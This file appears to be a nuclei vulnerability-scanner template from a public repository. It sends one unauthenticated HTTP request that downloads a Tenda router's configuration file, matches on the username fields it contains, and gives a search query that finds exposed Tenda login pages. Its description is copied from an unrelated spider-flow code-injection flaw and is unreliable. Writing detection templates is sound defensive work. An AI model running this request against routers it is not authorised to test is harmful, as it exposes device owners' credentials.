nuclei-templates/http/vulnerabilities/other/tendat-credential.yaml

33 lines
1.1 KiB
YAML
Raw Normal View History

2024-05-23 11:44:20 +00:00
id: tendat-credential
info:
name: TendaT Router Credential Exposure
author: pussycat0x
severity: high
description: |
A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.
reference:
- https://github.com/wy876/POC/blob/main/Tenda%E8%B7%AF%E7%94%B1%E5%99%A8%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2.md
metadata:
verified: true
fofa-query: title="Tenda | LOGIN" && country="CN"
http:
- raw:
- |
GET /cgi-bin/DownloadCfg/RouterCfm.jpg HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
matchers-condition: and
matchers:
- type: word
words:
- "http_username"
- "device_remark"
condition: and
- type: status
status:
- 200